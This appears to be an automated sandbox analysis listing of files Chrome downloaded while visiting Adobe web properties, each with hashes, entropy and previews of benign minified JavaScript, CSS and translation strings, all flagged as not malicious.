                  Preview:/* For license information please see https://prod.adobeccstatic.com/License/LICENSE.txt */./*! For license information please see AnalyticsProvider.d4f0229fb3d81dea2421.bundle.js.LICENSE.txt */."use strict";(self.webpackChunkuniversal_nav=self.webpackChunkuniversal_nav||[]).push([["AnalyticsProvider"],{485:(t,e,r)=>{r.d(e,{Z:()=>f});var n={profileJsUrl:"https://shared-components.adobe.com/component-loader/1.0.128/main.js",version:"1.4",uncJsUrl:"https://prod.adobeccstatic.com/unc/10.0/UNC-shared.js",adobeCCStaticBase:"https://prod.adobeccstatic.com/unav",help:{helpXURL:"https://helpx.adobe.com/support.cc.html"},community:{communityURL:"https://community.adobe.com"},jarvis:{jarvisJSUrl:"https://client.messaging.adobe.com/latest/AdobeMessagingClient.js",jarvisCSSUrl:"https://client.messaging.adobe.com/latest/AdobeMessagingClient.css"},commerceUriBase:"https://commerce.adobe.com",footer:{},theme:"light",ingest:{environment:"prod",rsid:"adbem-cchome-prod"}};function o(t){return o="functio
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (21802)
                  Category:downloaded
                  Size (bytes):21849
                  Entropy (8bit):5.53488144353243
                  Encrypted:false
                  SSDEEP:
                  MD5:F623851EF94FFDE62F5D31ED39789BF5
                  SHA1:7F176A9C5739BC268920791B0042C3942A731611
                  SHA-256:3AFF2668EF65E0F12467A39C05E7D63A073D2E7A9AA979D21AB1D747D4EBB845
                  SHA-512:54C346A2C722152DDA8F3E450AB9EFBA586AFDF4DC04D55A703E380F5A9FB83909BF3C6BD3C3778B489F975C980F9ADBB8AF53A7070D6393D37B42BB3C2B868D
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-genai-dropin/3.65.0_1.1122.0/5629-chunk.js
                  Preview:(self["webpackJsonp-genai"]=self["webpackJsonp-genai"]||[]).push([[5629],{a75v:(e,t,n)=>{"use strict";n.d(t,{v2:()=>copyConversation,xQ:()=>copyRichText,mj:()=>copySelectedText,GU:()=>copySummary,Bs:()=>copyTextWithFormattingToClipboard,m4:()=>getExcludedElements,Y0:()=>getSelectedTextInGFM,WU:()=>isCopyAllowed,Eg:()=>removeExcludedElements,b$:()=>replaceTextFromDataCopy,SU:()=>shareSummary});var r=n("/NRg"),i=n("3aG4"),o=(n("zjjr"),n("vZUK")),a=n("6Eex"),l=n("PGMW"),c=n("3v0I"),s=n("wQpj");function repeat(e,t){return Array(t+1).join(e)}var u=["ADDRESS","ARTICLE","ASIDE","AUDIO","BLOCKQUOTE","BODY","CANVAS","CENTER","DD","DIR","DIV","DL","DT","FIELDSET","FIGCAPTION","FIGURE","FOOTER","FORM","FRAMESET","H1","H2","H3","H4","H5","H6","HEADER","HGROUP","HR","HTML","ISINDEX","LI","MAIN","MENU","NAV","NOFRAMES","NOSCRIPT","OL","OUTPUT","P","PRE","SECTION","TABLE","TBODY","TD","TFOOT","TH","THEAD","TR","UL"];function isBlock(e){return is(e,u)}var d=["AREA","BASE","BR","COL","COMMAND","EMBED",
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (65536), with no line terminators
                  Category:downloaded
                  Size (bytes):279349
                  Entropy (8bit):5.465735497875973
                  Encrypted:false
                  SSDEEP:
                  MD5:A7C30DA6C0BF140FC3F65E75EE890C69
                  SHA1:2BFF848BB8C39AD286AE3EB4CE76DD113B7AB168
                  SHA-256:955AA16B8D1E8A567C60E2D57CAF899686A1EB570B02C70B9409FD61BDFE52E7
                  SHA-512:ACDADB5AC17FC6445CFE450C9C0F2072A4F01386FBF3BB7EB254574F810D64D1145DE36012E6B410D43251B002A31EE7FD267B6B6DA48D5233BEB2C973CD9D8F
                  Malicious:false
                  Reputation:unknown
                  URL:https://commerce.adobe.com/mini-apps/_next/static/chunks/5393-1cdc348cdb16e0022b24.js
                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5393],{92488:function(e){var t;"undefined"!==typeof self&&self,t=function(){return function(e){var t={};function a(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,a),r.l=!0,r.exports}return a.m=e,a.c=t,a.d=function(e,t,n){a.o(e,t)||Object.defineProperty(e,t,{configurable:!1,enumerable:!0,get:n})},a.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return a.d(t,"a",t),t},a.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},a.p="",a(a.s=7)}([function(e,t,a){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.getRegionDefaultLocale=t.getCountryLanguages=t.createLocaleFromIMS=t.getAppNameFromURL=t.isUmbrellaRegionApp=t.getUmbrellaRegions=t.getAllLocales=t.langScript=t.normalize=t.priuse=t.regions=t.region=t.script=t.extlang=t.lang=t.findValueByKeyIgnoreCase=t.findKey=void 0;var n=function(e,t){if(Array.isArray(e))retu
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Unicode text, UTF-8 text, with very long lines (55678), with no line terminators
                  Category:downloaded
                  Size (bytes):55702
                  Entropy (8bit):4.910217313984612
                  Encrypted:false
                  SSDEEP:
                  MD5:AC6EE3521319F9D893735773387FA4DA
                  SHA1:F4B027B894CBD7441043E4C7DA4A0FEC8D88FB01
                  SHA-256:B5FBC1AD89E9ADBD47F6DF7811BCE383E3741D25BE5E3D2E08913F26C9E04070
                  SHA-512:04BB542DECDAED86F063F4778C29CA22591BB1EA808920438C4FA165060F0CD541E87E05626C66FB4531BFB06E5E078535FA0CBFFF05CAAD5407B45D04DD8785
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-home2-dropin/3.52.0_2.1349.0/translations-en-US-json-chunk.js
                  Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},o=(new e.Error).stack;o&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[o]="7fa54265-98e3-4f50-96f1-a5eecf515f8b",e._sentryDebugIdIdentifier="sentry-dbid-7fa54265-98e3-4f50-96f1-a5eecf515f8b")}catch(e){}}();var _global="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};_global.SENTRY_RELEASE={id:"939110932eed36816ac9d538606bc3479c9c8233"},(self["webpackJsonp-home2"]=self["webpackJsonp-home2"]||[]).push([[7818],{t39f:e=>{e.exports=JSON.parse('{"HOME":"Home","SOMETHING_WENT_WRONG":"Something went wrong","TRY_LATER":"We\'re sorry for the inconvenience. Please try again later.","tools.quick_start":"Quick start","received.just":"Just now","specialDates.today":"Today ","specialDates.yesterday":"Yesterday ","specialDates.tomorrow":"Tomorrow ","nonDueString.sendNTrack":"RECEIVED ","nonDueString.review":"REVIEW R
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):39313
                  Entropy (8bit):7.28835004443013
                  Encrypted:false
                  SSDEEP:
                  MD5:238B29F112B94AF37438F5AD74C5893F
                  SHA1:001854A9523AAE385238A34124AECBB9DEED1759
                  SHA-256:4966D0FDDD4156EA311E5CF4B920570734C4648EFBC0DD2F2C5FDB78C8157A0F
                  SHA-512:A7CADA14EFC761BE5E62B04B1C42F0663FA3070E71FA7E5030DE50E1D03CB22BBBBA2B2B2B70D70F7525BA89973A57F2D254FADF4BB1D1548B194A2ACC0612D3
                  Malicious:false
                  Reputation:unknown
                  Preview:.........AdobeSansMM........... ............................".&.*.0.4.8.<.@.D.H.L.R.U.Y.^.c.j.n.r.y...........................................................................j.....................".3.?.H.L.S.W.\.a.e.i.m.p...:.y...................#.+./.4.9.=.B.G.F.......D...../.c.........$.A.U.p...................$.4.E.V.f.u...........................#./.9.>.H.R.Z...........................v..............M....!.................................!......'..5.......*.$...!........................4......a.a.....w*....$..............5... ..(...0......6.....5.......&.....7..$F.............!.................E....8................cf]...+.....+.........df^bf]..j.WWj8..g..........+.....+..g....cf^.................H. ...<....o<hhy.0..q.).,.j...#.."..).,.j...0....0....o.........).,c.y.j."0j.#q.).,c.xy.0..(.. ........=.A...s.A... ..9.D.....1......W...... .;..*..=....Z.. .k. .].......w......\.."..~7d.....R..... ......K......$..P.......Y...!....L....$.......f........$..... ..f}..f+......i
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (46766)
                  Category:downloaded
                  Size (bytes):46828
                  Entropy (8bit):5.92170246281835
                  Encrypted:false
                  SSDEEP:
                  MD5:B86D956DBB58F4DB5646037074CB8C9B
                  SHA1:A06E406FB6CA6521C0C5921EA503358B15689144
                  SHA-256:A32212C231693318C3C4617FAB5EF84651BAD277D5211D2DB91D3FF0A5BF385E
                  SHA-512:50A049D438DC7778AB88EA921E760F76A6D0BF2385EEE06B9D4464F0CD5A573F2249BFD0FEB8B60564C16EE2C3F3E756ABAD4A6BAAF867DF647E6F064DE491A6
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dcpreviewdropin/3.46.1_2.1134.0/printHelper_main.fe9e0a8b.js
                  Preview:var printHelper;(()=>{var e={"7gGk":(e,i,t)=>{var r,o=function(){var e=String.fromCharCode,i="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",t="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+-$",r={};function getBaseValue(e,i){if(!r[e]){r[e]={};for(var t=0;t<e.length;t++)r[e][e.charAt(t)]=t}return r[e][i]}var o={compressToBase64:function(e){if(null==e)return"";var t=o._compress(e,6,(function(e){return i.charAt(e)}));switch(t.length%4){default:case 0:return t;case 1:return t+"===";case 2:return t+"==";case 3:return t+"="}},decompressFromBase64:function(e){return null==e?"":""==e?null:o._decompress(e.length,32,(function(t){return getBaseValue(i,e.charAt(t))}))},compressToUTF16:function(i){return null==i?"":o._compress(i,15,(function(i){return e(i+32)}))+" "},decompressFromUTF16:function(e){return null==e?"":""==e?null:o._decompress(e.length,16384,(function(i){return e.charCodeAt(i)-32}))},compressToUint8Array:function(e){for(var i=o.compress(e),t=new U
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (65452)
                  Category:downloaded
                  Size (bytes):627734
                  Entropy (8bit):5.47270587202039
                  Encrypted:false
                  SSDEEP:
                  MD5:57FC7A8C31FB86CD4C2FD3057C1046F6
                  SHA1:C6438B6C6DF3FE66E83722F8BFFCAE217C2E3928
                  SHA-256:130D1B6ABDE4E15DB02843C92230F00C4D9D5A6512A663FBB403345FD2F46C09
                  SHA-512:C3C2150393E2A57DFA3B40FD512CD5C68A9BFA3939CBC19A52EED46A628F713B7E1548B1B2182A2C56F3764E67B23C595BBFB74755EBC30E99D53CC0120C2676
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-marketing/3.67.0_2.863.0/payment-notification-chunk.js
                  Preview:/*! For license information please see payment-notification-chunk.js.LICENSE.txt */.(self["webpackJsonp-marketing"]=self["webpackJsonp-marketing"]||[]).push([[416],{MWqy:(r,s,l)=>{"use strict";s.d=function A4uAlert(r){var s=_extends({},r);return y.default.createElement("svg",_extends({viewBox:"0 0 36 36"},s,s),y.default.createElement("path",{fillRule:"evenodd",d:"M17.127,2.579.4,32.512A1,1,0,0,0,1.272,34H34.728a1,1,0,0,0,.872-1.488L18.873,2.579A1,1,0,0,0,17.127,2.579ZM20,29.5a.5.5,0,0,1-.5.5h-3a.5.5,0,0,1-.5-.5v-3a.5.5,0,0,1,.5-.5h3a.5.5,0,0,1,.5.5Zm0-6a.5.5,0,0,1-.5.5h-3a.5.5,0,0,1-.5-.5v-12a.5.5,0,0,1,.5-.5h3a.5.5,0,0,1,.5.5Z"}))};var y=function _interopRequireDefault(r){return r&&r.__esModule?r:{default:r}}(l("YWiy"));function _extends(){return _extends=Object.assign?Object.assign.bind():function(r){for(var s=1;s<arguments.length;s++){var l=arguments[s];for(var y in l)Object.prototype.hasOwnProperty.call(l,y)&&(r[y]=l[y])}return r},_extends.apply(this,arguments)}},PqVL:(r,s,l)=>{"us
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Unicode text, UTF-8 text, with very long lines (20579), with no line terminators
                  Category:downloaded
                  Size (bytes):20589
                  Entropy (8bit):4.790350341854744
                  Encrypted:false
                  SSDEEP:
                  MD5:EBC1E4815771076A7C5827FFABE823BC
                  SHA1:9E33F99276B657F7134557147396458301490557
                  SHA-256:5D0091D351D0272B08A662FA0A6E09AE6E2AD274517019345465659AA989D133
                  SHA-512:7BE130335B8E1DD2092E5B6E85A3BCC6B63564FED03567473AEAACBB4F98AA24C8944414A39CA22C85CEE672754EDFE516EBD40F418A40AE6BAD4BE90DAC3E13
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-conversions2-dropin/3.17.1_2.146.0/translations-en-US-json.js
                  Preview:"use strict";(self["webpackJsonp-conversions2"]=self["webpackJsonp-conversions2"]||[]).push([[818],{R5i5:e=>{e.exports=JSON.parse('{"pdfti.dropzone.heading.seo":"Convert a PDF to JPG image","pdftw.dropzone.heading.seo":"Convert PDF to Word","pdftxls.dropzone.description.seo":"Drag and drop a PDF file to use our PDF to Microsoft Excel converter.","pdftxls.dropzone.heading.seo":"Convert PDF to Excel","pdftw.dropzone.description.seo":"Drag and drop a PDF file to use our PDF to Microsoft Word converter.","pdftppt.dropzone.heading.seo":"Convert PDF to PPT","pdftppt.dropzone.description.seo":"Drag and drop a PDF file to use our PDF to Microsoft PowerPoint (PPT) converter.","pdftw.dropzone.description.mobile.seo":"Select a PDF file to use our PDF to Microsoft Word converter.","pdfti.dropzone.description.mobile.seo":"Select a PDF, then convert to JPG, PNG, or TIFF file formats.","pdftxls.dropzone.description.mobile.seo":"Select a PDF file to use our PDF to Microsoft Excel converter.","pdftppt.
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (8786)
                  Category:downloaded
                  Size (bytes):8840
                  Entropy (8bit):5.413070825211609
                  Encrypted:false
                  SSDEEP:
                  MD5:B5A2FF9AA59200121E7756D479132ED8
                  SHA1:3592FC7021910C576DDE720939BA786CA7F3F7A8
                  SHA-256:1450CC9C4C14224EF8347827B05B1384DD76376420A06C9471D51F6D521CCE7A
                  SHA-512:49DDB77530CF4A6C5A8F20423ECA41C076739CC5C2253FC76FCB73B615688B7364553CA97247EEC49FE9B9BE010D95A835D81BD4D9DB28AF0D9265E0D64EFF04
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-fillsign2-dropin/3.17.1_1.498.0/fs2QTverbs8-chunk.js
                  Preview:(self["webpackJsonp-fillsign2"]=self["webpackJsonp-fillsign2"]||[]).push([[2925,1937],{yULq:(e,i,t)=>{"use strict";t.d(i,{v:()=>h});var r=t("YWiy"),s=t("Zm2D"),n=t("/hLX"),o=t("plsW"),a=t("ylf9"),l=t("B99j"),c=t("QwKn"),d=t.n(c),p=t("UpqL"),g=t("32It"),u=t("vwms"),b=t.n(u),f=t("4R+0"),y=t("1ZEG"),m=t("ezSO"),S=t("vhd8"),v=t("3oOw"),F=t("kVs5");const QTSignatureItemBase=e=>{var i,t;const[s,n]=(0,r.useState)(null),{selectedTool:o,sigData:c,setSigData:p,initialized:u,removeScribble:h,maybeAddFieldViaKeyboard:w}=(0,g.y)();return(0,r.useEffect)((()=>{if(null===s){var e;let r="verb-sendforsignature";var i,t;if(y.r$.getFillSignConfig().fillSignInEmbed&&!(null===(e=y.r$.getFillSignConfig())||void 0===e?void 0:e.disableRequestSignatureinFS)&&F.A.hasRSInQT())r=null!==(i=null===(t=y.r$.getFillSignConfig())||void 0===t?void 0:t.requestSignVerbID)&&void 0!==i?i:"verb-sendforsignature",(0,v.BN)(r,{context:"ChromeExtViewer",selectionName:"EmbedViewer"},(()=>{})),n(!0);else(0,v.BN)(r,{context:"ModernV
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (65536), with no line terminators
                  Category:downloaded
                  Size (bytes):67356
                  Entropy (8bit):5.448052239853968
                  Encrypted:false
                  SSDEEP:
                  MD5:F229AA3E668F92EFA5CBF53BF986F577
                  SHA1:A0FFEE86FABA8218AB5C94C8BD833030B2C08841
                  SHA-256:253DE6797359738AB8E6EFD01BEB82A4D2FF424BA05B58B32FBB51D95CF54AE7
                  SHA-512:BFC451E1E3705F6A6AE81F4FBA4CCD8C2EF6C50862053815823A7DD035F0031CB58729155156EC97BED0CA8D5418AAC2F364E7EEB55A01007EAE079B60A219D5
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-global-nav-dropin/3.58.0_3.586.0/progress-chunk.js
                  Preview:(self["webpackJsonp-global-nav"]=self["webpackJsonp-global-nav"]||[]).push([[192],{MWqy:(e,t,r)=>{"use strict";t.d=function A4uAlert(e){var t=_extends({},e);return s.default.createElement("svg",_extends({viewBox:"0 0 36 36"},t,t),s.default.createElement("path",{fillRule:"evenodd",d:"M17.127,2.579.4,32.512A1,1,0,0,0,1.272,34H34.728a1,1,0,0,0,.872-1.488L18.873,2.579A1,1,0,0,0,17.127,2.579ZM20,29.5a.5.5,0,0,1-.5.5h-3a.5.5,0,0,1-.5-.5v-3a.5.5,0,0,1,.5-.5h3a.5.5,0,0,1,.5.5Zm0-6a.5.5,0,0,1-.5.5h-3a.5.5,0,0,1-.5-.5v-12a.5.5,0,0,1,.5-.5h3a.5.5,0,0,1,.5.5Z"}))};var s=function _interopRequireDefault(e){return e&&e.__esModule?e:{default:e}}(r("YWiy"));function _extends(){return _extends=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var r=arguments[t];for(var s in r)Object.prototype.hasOwnProperty.call(r,s)&&(e[s]=r[s])}return e},_extends.apply(this,arguments)}},DvDf:(e,t,r)=>{"use strict";t.F=function A4uCheckmarkCircleOutline(e){var t=_extends({},e);return s.
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Unicode text, UTF-8 text, with very long lines (336)
                  Category:downloaded
                  Size (bytes):2602
                  Entropy (8bit):5.120486238734119
                  Encrypted:false
                  SSDEEP:
                  MD5:1AB0AA425D73149D0ADB411428BCC3CF
                  SHA1:6594AA1B316EC12FC5436A42936925DC0A295E47
                  SHA-256:96C92A9937C030602E83E9EAB4EAAFED14DD3839E75109B41D18F11D70B9EFBB
                  SHA-512:DFFF6CCD30F1558E5B5E4B5D7FE29A01360CD896A09670B426659F0E180F558A8E13ED0622A36C289ED4963DD5EBA87C393A19E51E1DC7580BE7A072197C3D16
                  Malicious:false
                  Reputation:unknown
                  URL:https://use.typekit.net/ubl8raj.css
                  Preview:/*. * The Typekit service used to deliver this font or fonts for use on websites. * is provided by Adobe and is subject to these Terms of Use. * http://www.adobe.com/products/eulas/tou_typekit. For font license. * information, see the list below.. *. * adobe-clean:. * - http://typekit.com/eulas/000000000000000000017701. * - http://typekit.com/eulas/000000000000000000017702. * - http://typekit.com/eulas/000000000000000000017703. * - http://typekit.com/eulas/0000000000000000000176ff. *. * . 2009-2025 Adobe Systems Incorporated. All Rights Reserved.. */./*{"last_published":"2017-09-12 16:59:23 UTC"}*/..@import url("https://p.typekit.net/p.css?s=1&k=ubl8raj&ht=tk&f=7180.7181.7182.7184&a=7357093&app=typekit&e=css");..@font-face {.font-family:"adobe-clean";.src:url("https://use.typekit.net/af/cb695f/000000000000000000017701/27/l?subset_id=1&fvd=n4&v=3") format("woff2"),url("https://use.typekit.net/af/cb695f/000000000000000000017701/27/d?subset_id=1&fvd=n4&v=3") format("woff"),url("h
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (9928)
                  Category:downloaded
                  Size (bytes):10021
                  Entropy (8bit):4.929986085720456
                  Encrypted:false
                  SSDEEP:
                  MD5:7F969396D26B9B5B6BDE9CFB19C79AA6
                  SHA1:39CF5E97184472F0F125494071A1A05D105BC575
                  SHA-256:31E49798893180092A89C218ABACBCFBCA52E7CC93EBB7BC8FDE8FD942517612
                  SHA-512:79E77923EA93CF13ABD21331A3384C5111CFF3AA896B237D9B3F5EB61DF8DFE47ADAD00037822F25C36605574331D998144FEFB40EE4FE168CA3EFF71B67B090
                  Malicious:false
                  Reputation:unknown
                  URL:https://prod.adobeccstatic.com/unav/1.4/UniversalNav.css
                  Preview:/* For license information please see https://prod.adobeccstatic.com/License/LICENSE.txt */...universal-nav-container #universal-nav.universal-nav-light{--alias-icon-neutral-default:#292929;--alias-content-neutral-default:#292929;--alias-background-semantic-accent-default-express:#5258E4;--alias-background-semantic-accent-default-spectrum:#0265DC;--alias-background-semantic-accent-default-spectrum-2:#3B63FB;--alias-background-semantic-accent-hover-spectrum-2:#274DEA;--alias-background-semantic-accent-hover-spectrum:#0054B6;--alias-background-semantic-accent-hover-express:#4046CA;--alias-icon-neutral-key-focus:#507BFF;--alias-content-neutral-key-focus:#507BFF;--border:#E1E1E1;--white-text:#FFF;--focus-ring:#507BFF;--profile-cta-secondary-border:#DADADA;--alias-icon-background-neutral-default:#292929;--alias-content-background-neutral-default:#292929;--profile-cta-hover-border:#C6C6C6;--spectrum-gray-200:#E1E1E1;--icon-palette-gray-25:#FFF;--icon-palette-gray-75:#F3F3F3;--icon-palette-gr
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (16334)
                  Category:downloaded
                  Size (bytes):16524
                  Entropy (8bit):5.21705279611525
                  Encrypted:false
                  SSDEEP:
                  MD5:B683FEFE3BABF990EBD8F38B5288974A
                  SHA1:4225B9F7032BAE15982CB7C2314CDA69BAEED4BE
                  SHA-256:81028D0AFBF8744988C5FEF1FE323CE4072DF14AC64FB5646479FFC6761DA6F3
                  SHA-512:7437667A94E312BE9F34F92F643E82B6D04BDBE6A418BA9735169EBC9BB25D32907E6A92829832F5D26DAF3354A0683F41AD085DF8521EE0706501AA1A4B841A
                  Malicious:false
                  Reputation:unknown
                  URL:https://prod.adobeccstatic.com/unav/1.4/JarvisLoader.16a27b721357bbce610e.bundle.js
                  Preview:/* For license information please see https://prod.adobeccstatic.com/License/LICENSE.txt */./*! For license information please see JarvisLoader.16a27b721357bbce610e.bundle.js.LICENSE.txt */."use strict";(self.webpackChunkuniversal_nav=self.webpackChunkuniversal_nav||[]).push([["JarvisLoader"],{485:(t,e,r)=>{r.d(e,{Z:()=>f});var n={profileJsUrl:"https://shared-components.adobe.com/component-loader/1.0.128/main.js",version:"1.4",uncJsUrl:"https://prod.adobeccstatic.com/unc/10.0/UNC-shared.js",adobeCCStaticBase:"https://prod.adobeccstatic.com/unav",help:{helpXURL:"https://helpx.adobe.com/support.cc.html"},community:{communityURL:"https://community.adobe.com"},jarvis:{jarvisJSUrl:"https://client.messaging.adobe.com/latest/AdobeMessagingClient.js",jarvisCSSUrl:"https://client.messaging.adobe.com/latest/AdobeMessagingClient.css"},commerceUriBase:"https://commerce.adobe.com",footer:{},theme:"light",ingest:{environment:"prod",rsid:"adbem-cchome-prod"}};function o(t){return o="function"==typeof
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (7073)
                  Category:downloaded
                  Size (bytes):7133
                  Entropy (8bit):5.220423808708953
                  Encrypted:false
                  SSDEEP:
                  MD5:117D01A049BB432290E57C6DA70572D7
                  SHA1:9D2E961B7804682B95BC5FDA9155837220EF306E
                  SHA-256:3D026CB828F7F5096A3A35D396EBB7B38E5577301C456189298CC106ECB5673C
                  SHA-512:78BB017B80E8F87B2760811938B421ED737C9B1C9E028B68FAAC7861692370F6212BFCE4A7BCB03FD6511646071D5188CC28D21523E778C4F5444FEEB01276F9
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-tutorial-dropin/3.35.0_4.95.0/tutorial-provider-chunk.js
                  Preview:"use strict";(self["webpackJsonp-tutorial-dropin"]=self["webpackJsonp-tutorial-dropin"]||[]).push([[3289],{KTWL:(e,t,o)=>{o.r(t),o.d(t,{default:()=>v});var i=o("plsW"),r=o("d369"),n=o("PO1Y"),l=o("9Bxo"),a=o("IYMA"),s={"edit-organize-demo":n.oe,"edit-organize-demo-v2":n.jO,"edit-organize-micro-demos":l.n,"onboarding-demo":a.L8},d=o("FXF0");function _typeof(e){return _typeof="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},_typeof(e)}function _defineProperties(e,t){for(var o=0;o<t.length;o++){var i=t[o];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(e,_toPropertyKey(i.key),i)}}function _toPropertyKey(e){var t=function _toPrimitive(e,t){if("object"!=_typeof(e)||!e)return e;var o=e[Symbol.toPrimitive];if(void 0!==o){var i=o.call(e,t||"default");if("object"!=_typeof(i))return i;throw new
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Unicode text, UTF-8 text, with very long lines (65469), with no line terminators
                  Category:downloaded
                  Size (bytes):522516
                  Entropy (8bit):5.339505865590107
                  Encrypted:false
                  SSDEEP:
                  MD5:D7AF24AE6E23B6BC44923A0C517DA8F6
                  SHA1:66315A36FD83ABBE4AA54C03509E6EB6F374E6DF
                  SHA-256:B47696D51178028056BDF0222D52EE2E55FAD93E86ED3D009E1096317108CAB7
                  SHA-512:2434F676A8318F787B133E91E8E67B39BDBF3B849F7A54064FAB71F0258116DACF29BDABDC4E944753BF4071C9EC2AF6BD5E6092EC060F6DB6383A0DAA73A7C4
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-comments-dropin/3.59.4_2.1115.1/EmojiPickerComponent-RHComments-expandedPanelContainer-chunk.js
                  Preview:"use strict";(self["webpackJsonp-comments"]=self["webpackJsonp-comments"]||[]).push([[568],{"upf+":(e,i,n)=>{function $parcel$interopDefault(e){return e&&e.__esModule?e.default:e}function $c770c458706daa72$export$2e2bcd8739ae039(e,i,n){return i in e?Object.defineProperty(e,i,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[i]=n,e}n.d(i,{LC:()=>$efa000751917694d$export$2e2bcd8739ae039,Ts:()=>$7adb23b0109cc36a$export$2cd8252107eb640b,aw:()=>$693b183b0a78708f$export$5ef5574deca44bc0});var a,f,s,o,d,r,t={},l=[],u=/acit|ex(?:s|g|n|p|$)|rph|grid|ows|mnc|ntw|ine[ch]|zoo|^ord|itera/i;function $fb96b826c0c5f37a$var$a(e,i){for(var n in i)e[n]=i[n];return e}function $fb96b826c0c5f37a$var$h(e){var i=e.parentNode;i&&i.removeChild(e)}function $fb96b826c0c5f37a$export$c8a8987d4410bf2d(e,i,n){var f,s,o,d={};for(o in i)"key"==o?f=i[o]:"ref"==o?s=i[o]:d[o]=i[o];if(arguments.length>2&&(d.children=arguments.length>3?a.call(arguments,2):n),"function"==typeof e&&null!=e.defaultProps)for(o in e.default
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (14806)
                  Category:downloaded
                  Size (bytes):14859
                  Entropy (8bit):5.3369446417181585
                  Encrypted:false
                  SSDEEP:
                  MD5:2772F891D2EBD807FCBCC366C3B16D26
                  SHA1:21E24059D90B01855E711CBB41E6BA9D9C5BE3EF
                  SHA-256:0ADFFDD2B74DC1B62591592F130CB36B0474B4D65AED04FAFB355B179CC26D73
                  SHA-512:889572F003D6CA2583E67456CC3C2E06582A3668E8272F75F229117467FADB5067013A75D04E627CCB4ED30CF4DDECBFE8B1F17641CB0A2A3846F3D2B5178AF6
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-ccverbs-dropin/3.17.1_2.303.0/express-provider.js
                  Preview:(self["webpackJsonp-ccverbs-dropin"]=self["webpackJsonp-ccverbs-dropin"]||[]).push([[7619],{zEjh:(e,t,s)=>{"use strict";s.d(t,{Z:()=>r});const r={LIFECYCLE_SELECTION_NAME:"lifecycle-selection",PREVIEW_SELECTION_NAME:"preview",LIFECYCLE_CONTEXT:"PDFNowLifeCycle",LIFECYCLE_CONTINUE_CONVERSION:"PDFNowLifeCycle-continue-at-conversion",LIFECYCLE_CONTINUE_FILES:"PDFNowLifeCycle-continue-at-files"}},E8CQ:(e,t,s)=>{"use strict";s.r(t),s.d(t,{default:()=>W});var r=s("plsW"),i=s("4PKp"),n=s("0Lu5"),o=s("oKgt");const utils_isUserAccountType=e=>r.auth2.getUserProfile().account_type===e;var a=s("fdIu"),c=s("E1TG"),l=s("jIQp"),d=s("XXkb"),p=s("Akfy"),u=s("kOQT"),m=s("+V+6"),g=s("zEjh");const f="TEAM",w="DIRECT",h="VIP",b="VIPMP",y="spark",_="free_spark",E="COM",v="GOV",utils_isTeamsUser=async function(){let{fulfillableItems:e=[],all:t=!1,marketSegments:s=[]}=arguments.length>0&&void 0!==arguments[0]?arguments[0]:{};const i=await r.providers.abp(),n=await i.getActiveSubscriptions();if(!n||!n.length)r
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:data
                  Category:downloaded
                  Size (bytes):627000
                  Entropy (8bit):6.810697584321916
                  Encrypted:false
                  SSDEEP:
                  MD5:5CC0AFBC2427773FBC971DDFFA7786B3
                  SHA1:AC6DF4409552BC4B511B68CC0BDA1B7D2A660058
                  SHA-256:16FC690FC5731C1E3A30F88B1E760DBD8C75363E2146004DC6D26FC8398A97C4
